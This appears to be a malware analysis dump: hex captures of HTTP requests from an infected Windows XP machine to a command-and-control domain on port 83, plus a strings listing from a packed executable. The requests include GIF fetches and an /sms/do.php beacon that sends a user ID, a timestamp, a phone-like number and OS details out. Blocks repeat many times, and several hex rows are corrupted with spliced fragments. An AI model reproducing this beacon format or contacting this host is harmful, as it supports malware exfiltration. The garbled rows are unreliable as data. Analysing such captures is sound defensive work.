0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3130   XXX&time=2013-10
0x00000030 (00048)   2d32355f 31373a35 363a3333 266d7367   -25_17:56:33&msg
0x00000040 (00064)   3d303137 31323833 38353234 30343726   =01712838524047&
0x00000050 (00080)   7665723d 32303131 2d342d31 31266f73   ver=2011-4-11&os
0x00000060 (00096)   3d57696e 646f7773 25323058 50266679   =Windows%20XP&fy
0x00000070 (00112)   3d302670 61756964 3d313139 31312663   =0&pauid=11911&c
0x00000080 (00128)   6865636b 49643d36 35322048 5454502f   heckId=652 HTTP/
0x00000090 (00144)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x000000a0 (00160)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x000000b0 (00176)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x000000c0 (00192)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x000000d0 (00208)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a            ep-Alive....

0x00000000 (00000)   47455420 2f322f2f 4c6f676f 2e676966   GET /2//Logo.gif
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2031 2e646838 31382e69   .Host: 1.dh818.i
0x000000b0 (00176)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a6c6c 612f342e 30202863 6f6d7061   ..lla/4.0 (compa
0x000000e0 (00224)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x000000f0 (00240)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000100 (00256)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000110 (00272)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x00000120 (00288)   20322e64 68383138 2e696e66 6f3a3833    2.dh818.info:83
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000140 (00320)   65702d41 6c697665 0d0a0d0a 31333920   ep-Alive....139 
0x00000150 (00336)   33313331 32363633 2020203d 30267061   31312663   =0&pa
0x00000160 (00352)   7569643d 31313931 3126630a            uid=11911&c.

0x00000000 (00000)   47455420 2f322f50 6f702e67 69662048   GET /2/Pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)   30292020 20323035 37363936 65203634   0)   2057696e 64
0x000000e0 (00224)   36663737 37332032 30346535 34323020   6f7773 204e5420 
0x000000f0 (00240)   33353265 33313362 20202020 57696e64   352e313b    Wind
0x00000100 (00256)   6f777320 4e542035 2e313b0a            ows NT 5.1;.


Strings
1>'.BN
2[')~;
\%@2!R
3ODM 4d
#}6a!'
6'x=V	
8^A[rE
-8hhwK
@+9_3Q
a?2rEsP
A#}=~R
bLNZBA&
cJ8,}t
eOZ-@W
e'r-,N
&EV{k.bl(
^f2#Uz
^fv@TPp
GetProcAddress
~G]	p2
\ia_vo0
^I:nSV
iplEDD
]-IVX:H
jyD!n|UN
LoadLibraryA
'M$\,--
mg4S j
MZKERNEL32.DLL
!O[\	J*e
%P}:!E
P`KeD?
PN\$$N
rsKhf<
TJSt?j
>t (Y6o
Ua_Pp9
U[*N9G
$w^]iB
WO@X{:
\",,xj)
XR}=k*)
Yt$)e^g6
z9?+aK?(
z_ADyX
Zxf]qS&'